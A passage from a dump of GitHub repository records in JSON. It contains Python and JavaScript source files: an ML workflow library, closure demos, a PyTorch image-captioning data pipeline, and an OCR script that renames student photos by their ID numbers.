\n\n def load_from_filesystem(self):\n if os.path.exists(\"data.csv\"):\n return pd.read_csv(\"data.csv\")\n else:\n raise FileNotFoundError()\n\n\nclass TaskPreprocessConcrete(workflow.TaskPreprocess):\n def __init__(self, *args, **kwargs):\n pass\n\n def run(self, data):\n data.drop([\"Country\", \"Name\"], axis=1, inplace=True)\n data.iloc[:, [0, 2, 3, 4, 5]] = sklearn.preprocessing.scale(data.iloc[:, [0, 2, 3, 4, 5]])\n return data.sample(frac=1)\n\n\nclass TaskTrainConcrete(workflow.TaskTrain):\n def __init__(self, *args, **kwargs):\n pass\n\n def build_model(self, *args, **kwargs):\n return GradientBoostingRegressor()\n\n def run(self, model, data):\n X = data.iloc[:, [0, 2, 3, 4, 5]]\n model.fit(X=X, y=data[\"Literacy\"])\n return model\n\n\nclass TaskSaveModelConcrete(workflow.TaskSaveModel):\n def __init__(self):\n pass\n\n def save(self, model):\n joblib.dump(model, \"model\")\n\n def load(self):\n if os.path.exists('model'):\n return joblib.load(\"model\")\n else:\n raise FileNotFoundError()\n\n\nif __name__ == \"__main__\":\n import logging\n logging.basicConfig(level=logging.DEBUG)\n model = workflow.DagflowCycle(\n task_get_data=TaskGetDataConcrete(),\n task_preprocess=TaskPreprocessConcrete(),\n task_train=TaskTrainConcrete(),\n task_model_saver=TaskSaveModelConcrete(),\n ).run()\n print(\"Prediction of Literacy Rate: \", model.predict([[-0.466107, -0.445900,\t0.794243, -0.257518, -0.714468]])[0])\n```\n\n## Roadmap:\n* Re-execute step\n* Tests\n* Upload to pypi\n* CI" }, { "alpha_fraction": 0.6530054807662964, "alphanum_fraction": 0.6612021923065186, "avg_line_length": 32.272727966308594, "blob_id": "9d45d49cdb199c08d09f12e25576d873861b8f53", "content_id": "2d4cb5db392c3b3da3bac4608ea1db77a95d62ba", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 366, "license_type": "permissive", "max_line_length": 69, "num_lines": 11, "path": "/setup.py", "repo_name": "ClaudioDavi/dagscience", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\n\nsetup(name='dagscience',\n version='0.1.0beta',\n description='Machine Learning Engineering Workflow Simplified',\n url='http://github.com/claudiodavi/dagscience',\n author='Claudio Davi',\n author_email='[email protected]',\n license='MIT',\n packages=find_packages(exclude=[\"tests\"]),\n zip_safe=False)\n" }, { "alpha_fraction": 0.5262601375579834, "alphanum_fraction": 0.5326048731803894, "avg_line_length": 34.02469253540039, "blob_id": "5e3e4673bfa8b95da7c3daa8dff0e1161d3e71a4", "content_id": "9e1cf669711fcce6076bb69522737af106617ff5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2837, "license_type": "permissive", "max_line_length": 85, "num_lines": 81, "path": "/dagscience/step_manager.py", "repo_name": "ClaudioDavi/dagscience", "src_encoding": "UTF-8", "text": "import logging\nimport os\nimport configparser\nimport traceback\n\n\nclass Step():\n \"\"\"\n Steps to be executed to create the machine learning model\n \"\"\"\n logger = logging.getLogger(__name__)\n default = {\n \"STEPS\": {\n \"STEP_1\": 'ready',\n \"STEP_2\": 'ready',\n \"STEP_3\": 'ready'\n }\n }\n\n def __init__(self, get_data, preprocess, train, model_saver):\n self.data_class = get_data\n self.preprocess_class = preprocess\n self.train_class = train\n self.model_class = model_saver\n\n def execute_steps(self, step_1=True, step_2=True, step_3=True):\n data = self.step_get_data(step_1)\n data = self.step_preprocess(data, step_2)\n model = self.step_train(data, step_3)\n return model\n\n def step_get_data(self, execute):\n self.logger.info('=============================================')\n self.logger.info('Step 1: Loading Data')\n if not execute:\n self.logger.info(\n 'Step 1: Not getting new data, loading from file system directly')\n return self.data_class.load_from_filesystem()\n else:\n self.logger.info(\n 'Step 1: Loading data from original source and saving to filesystem')\n data = self.data_class.load_from_source()\n self.data_class.save(data)\n return data\n\n def step_preprocess(self, data, execute):\n self.logger.info('=============================================')\n self.logger.info('Step 2: Preprocess')\n if not execute:\n self.logger.info('Step 2: Not preprocessing')\n return data\n else:\n self.logger.info(\"Step 2: Starting preprocessing step\")\n return self.preprocess_class.run(data)\n\n def step_train(self, data, execute):\n self.logger.info('=============================================')\n self.logger.info('Step 3: Training Model')\n if not execute:\n self.logger.info(\n 'Step 3: Not using training, loading model from file system')\n return self.model_class.load()\n else:\n self.logger.info('Step 3: Building and training model')\n model = self.train_class.build_model()\n model = self.train_class.run(model, data)\n self.model_class.save(model)\n return model\n\n def step_writer(self):\n config = configparser.ConfigParser()\n if os.path.exists('.steps'):\n config.read('.steps')\n print(config.sections)\n else:\n with open('.steps', 'w') as configfile:\n try:\n config.read_dict(self.default)\n config.write(configfile)\n except Exception as ex:\n traceback.print_stack()\n" } ]
6
Zora-zjj/pytorch-tutorial
https://github.com/Zora-zjj/pytorch-tutorial
db75a4576f7e20673cadb64e704f8922d8bfc7e5
768a5f2d19dc14e79de3cae31663096a6593b4ac
dd9e7a51d6706093227f4417bc8ff5a885b9ee95
refs/heads/master
2021-07-20T21:08:52.043288
2020-08-31T03:29:53
2020-08-31T03:29:53
210,796,789
0
0
MIT
2019-09-25T08:41:40
2019-09-25T08:40:02
2019-09-15T19:12:19
null
[ { "alpha_fraction": 0.560742974281311, "alphanum_fraction": 0.570950448513031, "avg_line_length": 57.01941680908203, "blob_id": "a3ac56ae42fd2b2e5cf91d9902ea797da00bbba7", "content_id": "d72aacf34176cd6b24f1a2476b188882c7701957", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6788, "license_type": "permissive", "max_line_length": 147, "num_lines": 103, "path": "/tutorials/03-advanced/image_captioning/data_loader.py", "repo_name": "Zora-zjj/pytorch-tutorial", "src_encoding": "UTF-8", "text": "import torch\nimport torchvision.transforms as transforms\nimport torch.utils.data as data #torch.utils.data主要包括以下三个类:Dataset / sampler.Sampler / DataLoader\nimport os\nimport pickle\nimport numpy as np\nimport nltk\nfrom PIL import Image\nfrom build_vocab import Vocabulary\nfrom pycocotools.coco import COCO\n\n\nclass CocoDataset(data.Dataset): #coco数据集,Dataset创建数据集, 参数:路径,字典,transform\n def __init__(self, root, json, vocab, transform=None)\n \"\"\"COCO Custom Dataset compatible with torch.utils.data.DataLoader.\"\"\" \n def __init__(self, root, json, vocab, transform=None):\n \"\"\"Set the path for images, captions and vocabulary wrapper.\n \n Args:\n root: image directory. #图片目录\n json: coco annotation file path. #路径\n vocab: vocabulary wrapper. #字典\n transform: image transformer.\n \"\"\"\n self.root = root\n self.coco = COCO(json)\n self.ids = list(self.coco.anns.keys()) #ids:anns的id\n self.vocab = vocab\n self.transform = transform\n\n def __getitem__(self, index): #index是anns_id的序列号,(给定某个anns_id的index)--- 返回1个(图片,该caption单词id列表)\n \"\"\"Returns one data pair (image and caption).\"\"\"\n coco = self.coco #构建coco对象, coco = COCO(json_file)\n vocab = self.vocab\n ann_id = self.ids[index] #caption的id,有1个\n caption = coco.anns[ann_id]['caption'] #caption\n img_id = coco.anns[ann_id]['image_id'] #与caption对应的图片id,有1个\n path = coco.loadImgs(img_id)[0]['file_name'] #coco.loadImgs:根据id号,导入对应的图像信息,file_name是图片的名称,[0]???\n image = Image.open(os.path.join(self.root, path)).convert('RGB') #os.path.join:路径拼接; image的路径,这样才能打开图像,直接根据id不行\n \n if self.transform is not None:\n image = self.transform(image) #图片处理\n\n # Convert caption (string) to word ids. caption → target\n tokens = nltk.tokenize.word_tokenize(str(caption).lower()) #某个index的caption的分词\n caption = []\n caption.append(vocab('<start>')) #vocab是类Vocabulary,vocab(单词)是_call_,返回id\n caption.extend([vocab(token) for token in tokens])\n caption.append(vocab('<end>')) #caption是id序列 \n target = torch.Tensor(caption) #caption → target\n return image, target #image,target 图片,单词id列表\n\n def __len__(self): #有__len__(self)函数来获取数据集的长度.\n return len(self.ids) \n\n\ndef collate_fn(data): #参数:data,应该是上个返回的image,target #加上batch,补长\n \"\"\"Creates mini-batch tensors from the list of tuples (image, caption).\n We should build custom collate_fn rather than using default collate_fn, \n because merging caption (including padding) is not supported in default.\n Args: #输入:\n data: list of tuple (image, caption). #列表元祖(image, caption)\n - image: torch tensor of shape (3, 256, 256). #image (3, 256, 256)\n - caption: torch tensor of shape (?); variable length. #caption (variable length)\n Returns: #输出:\n images: torch tensor of shape (batch_size, 3, 256, 256). #images (batch_size, 3, 256, 256)\n targets: torch tensor of shape (batch_size, padded_length). #targets (batch_size, padded_length),扩长,数据为单词id号\n lengths: list; valid length for each padded caption.\n \"\"\"\n # Sort a data list by caption length (descending order).\n data.sort(key=lambda x: len(x[1]), reverse=True) #list.sort(cmp=None, key=None, reverse=False ) cmp可选参数、key用来进行比较的元素、默认False升序,按target长度排序\n images, captions = zip(*data) #zip() 打包为元组的列表,zip(*) 将元组解压为列表\n\n # Merge images (from tuple of 3D tensor to 4D tensor).\n images = torch.stack(images, 0) #图片叠加,到4维,在0位上\n\n # Merge captions (from tuple of 1D tensor to 2D tensor). #caption叠加,到2维\n lengths = [len(cap) for cap in captions] #每个caption的长度\n targets = torch.zeros(len(captions), max(lengths)).long() #加上batch的caption,先是0,后补数据\n for i, cap in enumerate(captions):\n end = lengths[i]\n targets[i, :end] = cap[:end] #将caption前面有数据即单词id的补在targets中,扩展的为0\n return images, targets, lengths \n\ndef get_loader(root, json, vocab, transform, batch_size, shuffle, num_workers):\n \"\"\"Returns torch.utils.data.DataLoader for custom coco dataset.\"\"\"\n # COCO caption dataset\n coco = CocoDataset(root=root,\n json=json,\n vocab=vocab,\n transform=transform)\n \n # Data loader for COCO dataset\n # This will return (images, captions, lengths) for each iteration.\n # images: a tensor of shape (batch_size, 3, 224, 224). #(batch_size, 3, 224, 224)\n # captions: a tensor of shape (batch_size, padded_length). #(batch_size, padded_length) 扩展的长度,1位是字符串形式\n # lengths: a list indicating valid length for each caption. length is (batch_size).\n data_loader = torch.utils.data.DataLoader(dataset=coco, #dataset (Dataset): 加载数据的数据集\n batch_size=batch_size, #batch_size (int, optional): 每批加载多少个样本\n shuffle=shuffle, #shuffle (bool, optional): 设置为“真”时,在每个epoch对数据打乱.(默认:False)\n num_workers=num_workers, #num_workers (int, optional): 用于加载数据的子进程数。0表示数据将在主进程中加载​​。(默认:0)\n collate_fn=collate_fn) #collate_fn (callable, optional): 合并样本列表以形成一个 mini-batch. #是上面的定义函数\n return data_loader\n" }, { "alpha_fraction": 0.5829439163208008, "alphanum_fraction": 0.5919976830482483, "avg_line_length": 44.6533317565918, "blob_id": "0af7b75d7390d5b3d9a5c5defc0d2ffcea7a782c", "content_id": "23fd3254bc9fca2a2dbc8505d2c1e446f0e129a6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3954, "license_type": "permissive", "max_line_length": 124, "num_lines": 75, "path": "/tutorials/03-advanced/image_captioning/build_vocab.py", "repo_name": "Zora-zjj/pytorch-tutorial", "src_encoding": "UTF-8", "text": "import nltk\nimport pickle\nimport argparse #argparse是一个Python模块:命令行选项、参数和子命令解析器\nfrom collections import Counter\nfrom pycocotools.coco import COCO #pycocotools是微软提供的导入coco信息的库\n\nclass Vocabulary(object):\n \"\"\"Simple vocabulary wrapper.\"\"\"\n def __init__(self):\n self.word2idx = {} \n self.idx2word = {}\n self.idx = 0\n\n def add_word(self, word): \n if not word in self.word2idx:\n self.word2idx[word] = self.idx #建立 word2idx索引、idx2word索引\n self.idx2word[self.idx] = word\n self.idx += 1\n\n def __call__(self, word):\n if not word in self.word2idx:\n return self.word2idx['<unk>'] \n return self.word2idx[word]\n\n def __len__(self):\n return len(self.word2idx)\n\ndef build_vocab(json, threshold):\n \"\"\"Build a simple vocabulary wrapper.\"\"\"\n coco = COCO(json) #构建coco对象, coco = pycocotools.coco.COCO(json_file)\n counter = Counter() #统计词频, 词:频数\n ids = coco.anns.keys() #anns的ids\n for i, id in enumerate(ids): \n caption = str(coco.anns[id]['caption']) #获取caption\n tokens = nltk.tokenize.word_tokenize(caption.lower()) # word_tokenize 对caption分词\n counter.update(tokens) #将tokens更新加入到counter中\n\n if (i+1) % 1000 == 0:\n print(\"[{}/{}] Tokenized the captions.\".format(i+1, len(ids))) #百分多少的caption单词已被Tokenized\n\n # If the word frequency is less than 'threshold', then the word is discarded. 频率小于阙值的单词被遗弃\n words = [word for word, cnt in counter.items() if cnt >= threshold] #cnt是频数,得到大于阙值的单词表 words\n\n # Create a vocab wrapper and add some special tokens.\n vocab = Vocabulary()\n vocab.add_word('<pad>') \n vocab.add_word('<start>')\n vocab.add_word('<end>')\n vocab.add_word('<unk>')\n\n \n for i, word in enumerate(words):\n vocab.add_word(word) \n return vocab #词汇表 vocab\n\ndef main(args): #参数:caption路径,保存路径,阙值\n vocab = build_vocab(json=args.caption_path, threshold=args.threshold) # 'data/annotations/captions_train2014.json' ,4\n vocab_path = args.vocab_path #定义一个路径,后面将字典保存到这 # './data/vocab.pkl'\n with open(vocab_path, 'wb') as f: \n pickle.dump(vocab, f) #pickle.dump(obj, file, [,protocol]),序列化对象,将对象obj保存到文件file中去。参数protocol是序列化模式,默认是0\n print(\"Total vocabulary size: {}\".format(len(vocab)))\n print(\"Saved the vocabulary wrapper to '{}'\".format(vocab_path))\n\n\nif __name__ == '__main__': #当直接运行build_vocab.py时,下面代码运行;当import时,不运行\n parser = argparse.ArgumentParser() #创建一个 ArgumentParser 对象;ArgumentParser 对象包含将命令行解析成 Python 数据类型所需的全部信息\n parser.add_argument('--caption_path', type=str, #给一个 ArgumentParse r对象添加程序参数信息 #类型;\n default='data/annotations/captions_train2014.json', #当参数未在命令行中出现时使用的值\n help='path for train annotation file') #一个此选项作用的简单描述\n parser.add_argument('--vocab_path', type=str, default='./data/vocab.pkl', \n help='path for saving vocabulary wrapper')\n parser.add_argument('--threshold', type=int, default=4, \n help='minimum word count threshold')\n args = parser.parse_args() #用 parse_args() 方法解析参数\n main(args)\n" }, { "alpha_fraction": 0.5933666229248047, "alphanum_fraction": 0.6079055070877075, "avg_line_length": 51.404762268066406, "blob_id": "548c484d0d46956b3ad35b427eb9c39016ca71c9", "content_id": "e5dfc183fde09a7d437a7555e85c5c9d701fc8b7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2531, "license_type": "permissive", "max_line_length": 132, "num_lines": 42, "path": "/tutorials/03-advanced/image_captioning/resize.py", "repo_name": "Zora-zjj/pytorch-tutorial", "src_encoding": "UTF-8", "text": "import argparse\nimport os\nfrom PIL import Image\n\n\ndef resize_image(image, size): #resize一张图片\n \"\"\"Resize an image to the given size.\"\"\"\n return image.resize(size, Image.ANTIALIAS) #resize指定大小和质量,Image.ANTIALIAS高质量\n\ndef resize_images(image_dir, output_dir, size): #批量resize图片后保存到output_dir\n \"\"\"Resize the images in 'image_dir' and save into 'output_dir'.\"\"\"\n if not os.path.exists(output_dir): #os操作系统,os.path.exists判断括号里的文件是否存在,(文件路径)\n os.makedirs(output_dir) #os.makedirs(path, mode=0o777)递归创建目录,path - 需要递归创建的目录,mode - 权限模式\n\n images = os.listdir(image_dir) #os.listdir(path)返回指定的文件夹包含的文件或文件夹的名字的列表,path - 需要列出的目录路径\n num_images = len(images)\n for i, image in enumerate(images):\n with open(os.path.join(image_dir, image), 'r+b') as f: #os.path.join连接两个或更多的路径名组件\n with Image.open(f) as img:\n img = resize_image(img, size)\n img.save(os.path.join(output_dir, image), img.format) #.save保存,format???\n if (i+1) % 100 == 0:\n print (\"[{}/{}] Resized the images and saved into '{}'.\"\n .format(i+1, num_images, output_dir))\n\ndef main(args): #args:参数\n image_dir = args.image_dir #'./data/train2014/'\n output_dir = args.output_dir #'./data/resized2014/'\n image_size = [args.image_size, args.image_size] #256\n resize_images(image_dir, output_dir, image_size)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser() #命令行工具argparse,创建解析器,创建一个 ArgumentParser 对象\n parser.add_argument('--image_dir', type=str, default='./data/train2014/', #add_argument:读入命令行参数,\n help='directory for train images') \n parser.add_argument('--output_dir', type=str, default='./data/resized2014/',\n help='directory for saving resized images')\n parser.add_argument('--image_size', type=int, default=256,\n help='size for image after processing')\n args = parser.parse_args() #parse_args(args=None, nampespace=None)将之前add_argument()定义的参数args进行赋值namespace,并返回namespace\n main(args)\n" } ]
3
KentaroUeda/PythonClosure
https://github.com/KentaroUeda/PythonClosure
b9f5d2d39b5174225de79acf8ca650e5b8706b75
6cb91e7b46de76f00f6ef559f78ba078dc7f4873
843001d55b08d3ff7f38e212cf60d47b16e3607a
refs/heads/master
2019-06-10T12:22:26.852080
2016-04-18T03:04:48
2016-04-18T03:04:48
56,378,852
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.41813185811042786, "alphanum_fraction": 0.4664835035800934, "avg_line_length": 20.162790298461914, "blob_id": "5424e46b2e90a0d0c6205a85fb49084640253358", "content_id": "8205c6e0a71b12f7042bc627ff5439afbe74571a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1822, "license_type": "no_license", "max_line_length": 65, "num_lines": 86, "path": "/JavaScriptClosure.js", "repo_name": "KentaroUeda/PythonClosure", "src_encoding": "UTF-8", "text": "\nvar closureCalclator = function(par1, par2){\n \n 'use strict'\n \n var setter, getter, add, sub, multi, div, original,\n param1 = par1,\n param2 = par2\n ;\n \n setter = function(p1, p2){\n param1 = p1;\n param2 = p2;\n return {param1:param1, param2:param2};\n };\n \n getter = function(){\n return {param1:param1, param2:param2};\n };\n \n add = function(){\n return param1 + param2;\n };\n \n sub = function(){\n return param1 - param2;\n };\n \n multi = function(){\n return param1 * param2;\n };\n \n div = function(){\n return parseFloat(param1) / param2;\n };\n \n original = function(func){\n return func(param1, param2);\n };\n \n return {\n setter :setter,\n getter :getter,\n add :add,\n sub :sub,\n multi :multi,\n div :div,\n original:original\n };\n \n};\n\n\n(function main(){\n \n 'use strict'\n \n var dot,\n cc1 = closureCalclator(10, 20),\n cc2 = closureCalclator(30, 40)\n ;\n \n dot = function(a, b){\n return a*a + b*b;\n }\n \n console.log(cc1.getter()); // [ 10, 20 ]\n console.log(cc1.add());  // 30\n console.log(cc1.setter(1, 2)); // { param1: 1, param2: 2 }\n console.log(cc1.add()); // 3\n console.log(cc1.sub()); // -1\n console.log(cc1.getter()); // { param1: 1, param2: 2 }\n \n console.log('');\n \n console.log(cc2.getter()); // [ 30, 40 ]\n console.log(cc2.multi()); // 1200\n console.log(cc2.div()); // 0.75\n\n console.log( \n cc2.original(function(x, y){ return x*x + y*y; }) // 2500\n );\n console.log(cc2.original(dot)); // 2500\n \n console.log('--------------------');\n \n})();" }, { "alpha_fraction": 0.7564516067504883, "alphanum_fraction": 0.7661290168762207, "avg_line_length": 37.75, "blob_id": "a000a7dd9f879ead46dbadedd02aeadafea1e335", "content_id": "f4c83974e71a086f6a6460ae504b9afbc09b819c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 806, "license_type": "no_license", "max_line_length": 133, "num_lines": 16, "path": "/README.md", "repo_name": "KentaroUeda/PythonClosure", "src_encoding": "UTF-8", "text": "### PythonClosure\n高階関数を利用したサンプルプログラムを Python と Node.js で作成しました.\n\n- [Python 版](https://github.com/KentaroUeda/PythonClosure/blob/master/pythonClosure.py)\n\n- [JavaScript 版](https://github.com/KentaroUeda/PythonClosure/blob/master/JavaScriptClosure.js)\n\n##### 参考文献\n\n- [高階関数: 関数のネスト、クロージャ](http://bacspot.dip.jp/virtual_link/www/si.musashi-tech.ac.jp/new_www/Python_IntroProgramming/03/index-2c.html)\n\n- [関数型プログラミング HOWTO](http://docs.python.jp/2/howto/functional.html)\n\n- [ラムダ (lambda) による匿名関数の作成](http://python.keicode.com/lang/functions-lambda.php)\n\n- [JavaScript によるオブジェクト指向プログラミング](http://keicode.com/script/scr24.php)\n" }, { "alpha_fraction": 0.4442614018917084, "alphanum_fraction": 0.49093905091285706, "avg_line_length": 24.521127700805664, "blob_id": "febf72079456278f59fabb5826b05f1df044936b", "content_id": "3b7d6318aff5a595bb3eb6b4cf073416220e8093", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2001, "license_type": "no_license", "max_line_length": 78, "num_lines": 71, "path": "/pythonClosure.py", "repo_name": "KentaroUeda/PythonClosure", "src_encoding": "UTF-8", "text": "# coding:utf-8\n\ndef closureCalclator(par1, par2):\n \n # 関数内グローバル変数は以下のように dict 型で定義するしかない?\n globalVal = {\n 'param1':par1,\n 'param2':par2\n }\n \n def setter(p1, p2):\n globalVal['param1'] = p1\n globalVal['param2'] = p2\n return globalVal\n \n def getter():\n return {'param1' : globalVal['param1'], 'param2': globalVal['param2']}\n \n def add():\n return globalVal['param1'] + globalVal['param2']\n \n def sub():\n return globalVal['param1'] - globalVal['param2']\n \n def multi():\n return globalVal['param1'] * globalVal['param2']\n \n def div():\n return float(globalVal['param1']) / globalVal['param2']\n \n def original(func):\n return func(globalVal['param1'], globalVal['param2'])\n \n return {\n 'setter' :setter,\n 'getter' :getter,\n 'add' :add,\n 'sub' :sub,\n 'multi' :multi,\n 'div' :div,\n 'original':original\n }\n\n\nif __name__ == \"__main__\":\n \n cc1 = closureCalclator(10, 20)\n cc2 = closureCalclator(30, 40)\n \n def dot(a, b):\n return a*a + b*b\n \n print cc1['getter']() # (10, 20)\n print cc1['add']() # 30\n print cc1['setter'](1, 2) # {'param2': 2, 'param1': 1}\n print cc1['add']() # 3\n print cc1['sub']() # -1\n print cc1['getter']() # {'param2': 2, 'param1': 1}\n \n print ''\n \n print cc2['getter']() # (30, 40)\n print cc2['multi']() # 1200\n print cc2['div']() # 0.75\n \n # JavaScript のように,無名関数に複数ステップの処理をさせるのはできない?\n # dot 関数のように,通常の関数として記述しそれを引数として与えればできる.\n print cc2['original'](lambda x, y: x*x + y*y) # 2500\n print cc2['original'](dot) # 2500\n \n print '--------------------'\n \n " } ]
3
TurnA-Lab/auto-rename-pic
https://github.com/TurnA-Lab/auto-rename-pic
9452074c8cee80df39eaa55ef5418674c2ed4ae3
93659243754586775765bb888a8daf31b1e48fb7
d3ceeb4998e112193793e00a83131ef0018f3dcc
refs/heads/master
2023-04-13T00:08:40.035178
2020-12-10T14:48:17
2020-12-10T14:48:17
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4937114715576172, "alphanum_fraction": 0.5067817568778992, "avg_line_length": 29.148698806762695, "blob_id": "17772a240f30487a5a61a293bd4a5e3f90edd9fe", "content_id": "7c3f8a412affc723be0311653e23c9e7b9ef6d77", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8956, "license_type": "no_license", "max_line_length": 119, "num_lines": 269, "path": "/pick_stu_number.py", "repo_name": "TurnA-Lab/auto-rename-pic", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'iskye'\n\nimport os\nimport re\nimport string\nfrom shutil import copyfile\nfrom typing import List\n\nimport beeprint\nimport cv2\nimport numpy\nfrom cnocr import CnOcr\nfrom cnstd import CnStd\nfrom tqdm import tqdm\n\n\nclass PickStuNumber:\n def __init__(self, path: str, show_img: bool = False):\n self.__ext = {'jpg', 'jpeg'}\n self.__ocr = CnOcr(model_name='densenet-lite-gru', cand_alphabet=string.digits, name=path)\n self.__std = CnStd(name=path)\n self.__info_dict = {}\n self.__dup_name_dict = {}\n\n # 先对路径进行替换\n path = self.__format_path(path)\n\n # 根据传入的路径判断操作\n if os.path.isdir(path) or os.path.isfile(path):\n files = [self.__format_path(os.path.join(path, f)) for f in os.listdir(path) if\n (os.path.isfile(os.path.join(path, f)) and self.__is_image(f))] \\\n if os.path.isdir(path) \\\n else [path]\n for file in tqdm(files):\n self.__handle_info(file,\n self.__ocr_number(self.__std_number(self.__cutter(file, show_img))))\n else:\n print(f'获取数据错误,“{path}”既不是文件也不是文件夹')\n\n @staticmethod\n def __format_path(path: str):\n return os.path.abspath(path).replace('\\\\', '/')\n\n @staticmethod\n def __get_suffix(path: str) -> str:\n \"\"\"\n 获取后缀\n :param path: 图片路径\n :return: 是否为图片\n \"\"\"\n return path.split('.')[-1]\n\n def __is_image(self, path: str) -> bool:\n return self.__get_suffix(path) in self.__ext\n\n @staticmethod\n def __cutter(path: str, show_img: bool = False) -> numpy.ndarray:\n \"\"\"\n 切割图片\n :param path: 图片路径\n :param show_img: 是否需要展示图片\n :return: 图片对应的 ndarray\n \"\"\"\n print(path)\n\n # 以灰度模式读取图片\n origin_img = cv2.imread(path, 0)\n\n if show_img:\n # 自由拉伸窗口\n # cv2.namedWindow('bin img', 0)\n cv2.imshow('origin img', origin_img)\n\n # 切出一部分,取值是经验值\n origin_img = origin_img[:origin_img.shape[0] // 2]\n\n # 二值化\n _, origin_img = cv2.threshold(origin_img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n\n if show_img:\n # 自由拉伸窗口\n # cv2.namedWindow('bin img', 0)\n cv2.imshow('bin img', origin_img)\n\n # 形态学转换,主要为了检测出那个红色的 banner\n kernel = numpy.ones((15, 15), dtype=numpy.uint8)\n # img = cv2.erode(img, kernel=kernel, iterations=1)\n img = cv2.dilate(origin_img, kernel=kernel, iterations=2)\n\n # 边缘检测\n contours, _ = cv2.findContours(img, 1, 2)\n # 找出第二大的,即红色的 banner\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n\n if len(contours) > 1:\n # 获取包围 banner 的矩形数据\n x, y, w, h = cv2.boundingRect(contours[1])\n\n # 目前所有的数值设定使用的是经验值\n if w * h > 250000:\n # 需要识别的学号部分\n # 左上角坐标\n left_top_x = x\n left_top_y = y + h + 20\n # 右下角坐标\n right_down_x = x + w\n right_down_y = y + h + 190\n\n img = origin_img[left_top_y:right_down_y, left_top_x:right_down_x]\n else:\n img = origin_img[120:]\n else:\n img = origin_img[120:]\n\n # 对切出的图片进行再次处理,以便图像识别\n kernel = numpy.ones((2, 2), dtype=numpy.uint8)\n # 腐蚀以加粗\n img = cv2.erode(img, kernel=kernel, iterations=1)\n # 重新映射回 rgb\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)\n\n if show_img:\n # 自由拉伸窗口\n # cv2.namedWindow('final img', 0)\n cv2.imshow('final img', img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n return img\n\n def __ocr_number(self, img_list: List[numpy.ndarray]):\n \"\"\"\n 识别数字\n :param img_list:\n :return:\n \"\"\"\n return self.__ocr.ocr_for_single_lines(img_list)\n\n def __std_number(self, img: numpy.ndarray):\n \"\"\"\n 定位数字\n :param img:\n :return:\n \"\"\"\n return [i['cropped_img'] for i in self.__std.detect(img)]\n\n @staticmethod\n def __handle_result_list(result_list: List[List[str]]) -> [str, bool]:\n \"\"\"\n 处理结果列表\n :param result_list: 结果列表\n :return: 结果,是否有效\n \"\"\"\n result = result_list[0]\n\n if len(result) < 12 and len(result_list) > 1:\n for i in result_list:\n if len(i) >= 12:\n result = i\n\n result = ''.join(result[:12] if len(result) >= 12 else result)\n print(result, re.match(r'\\d{12}', result) is not None)\n return result, re.match(r'\\d{12}', result) is not None\n\n def __handle_dup_name(self, name, path):\n dup_keys = self.__dup_name_dict.get(name)\n # 如设置过,即表明有重复的\n if dup_keys:\n # 设置重复的为 True,只要第一次重复时设置即可\n if 1 == len(dup_keys):\n self.__info_dict[dup_keys[0]]['dup'] = True\n # 将本次的 path 也添加进去\n self.__dup_name_dict[name].append(path)\n return True\n else:\n self.__dup_name_dict[name] = [path]\n return False\n\n def __handle_info(self, key, value):\n \"\"\"\n 处理每条信息\n :param key:\n :param value:\n \"\"\"\n name, is_legal = self.__handle_result_list(value)\n self.__info_dict[key] = {\n 'name': name,\n 'suffix': self.__get_suffix(key),\n 'legal': is_legal,\n 'dup': self.__handle_dup_name(name, key)\n }\n\n def print_info(self):\n \"\"\"\n 打印图片信息\n :return:\n \"\"\"\n beeprint.pp(self.__info_dict)\n return self\n\n def print_dup(self):\n \"\"\"\n 打印重复图片信息\n :return:\n \"\"\"\n beeprint.pp(self.__dup_name_dict)\n return self\n\n def write_out(self,\n path: str = '.',\n out_path_suc: str = 'output_suc',\n out_path_dup: str = 'output_dup',\n out_path_fail: str = 'output_fail'):\n \"\"\"\n 输出重命名后的图片到文件夹\n :param path: 文件夹路径\n :param out_path_suc: 合规且不重复图片所在的文件夹\n :param out_path_dup: 合规但是重复图片所在的文件夹\n :param out_path_fail: 其它图片所在文件夹\n :return: self\n \"\"\"\n # 处理路径\n path = self.__format_path(path)\n\n if os.path.isdir(path):\n # 拼接文件路径\n suc = os.path.join(path, out_path_suc)\n fail = os.path.join(path, out_path_fail)\n dup = os.path.join(path, out_path_dup)\n\n # 创建结果文件夹\n not os.path.exists(suc) and os.makedirs(suc)\n not os.path.exists(fail) and os.makedirs(fail)\n not os.path.exists(dup) and os.makedirs(dup)\n\n # 将图片输出到相应的文件夹\n for key, value in self.__info_dict.items():\n # 合规且不重复\n if value.get('legal') is True and value.get('dup') is False:\n copyfile(key, os.path.join(suc, f'{value.get(\"name\")}.{value.get(\"suffix\")}'))\n # 合规但是重复\n elif value.get('legal') is True and value.get('dup') is True:\n index = self.__dup_name_dict[value.get(\"name\")].index(key)\n copyfile(key,\n os.path.join(dup, f'{value.get(\"name\")}.{index}.{value.get(\"suffix\")}'))\n else:\n copyfile(key,\n os.path.join(fail, f'{value.get(\"name\")}.{value.get(\"suffix\")}' or os.path.split(key)[1]))\n else:\n print(f'“{path}” 并非一个合法的路径!')\n\n return self\n\n\ndef main():\n \"\"\"请自行寻找测试数据\"\"\"\n # PickStuNumber(\"./pics\", show_img=False).print_info().write_out()\n # PickStuNumber(\"./pics/test.jpeg\", show_img=True).print_info()\n # 